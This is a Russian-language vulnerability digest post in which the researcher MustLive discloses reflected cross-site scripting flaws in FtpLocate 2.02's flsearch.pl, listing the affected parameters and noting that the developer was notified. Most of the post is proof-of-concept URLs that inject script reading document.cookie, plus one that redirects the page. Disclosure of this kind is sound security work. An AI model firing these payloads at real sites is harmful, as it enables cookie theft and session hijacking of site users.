Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	16 марта 2007 г.
Subject:	Vulnerabilities в FtpLocate

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною 12.10.2006 Cross-Site Scripting уязвимостях в FtpLocate - движке поиска по ftp серверам.

Уязвимости в скрипте flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit и sizebytes.

XSS:

http://site/cgi-bin/ftplocate/flsearch.
pl?all=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&query=test

http://site/cgi-bin/ftplocate/flsearch.
pl?query=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cgi-bin/ftplocate/flsearch.
pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.
location%3D'http://websecurity.com.ua'%3C/script%3E

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/706/
Данные уязвимости имеют место в версии FtpLocate 2.02 (и возможно предыдущих). О найденных уязвимостях я уже сообщил разработчику приложения.

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua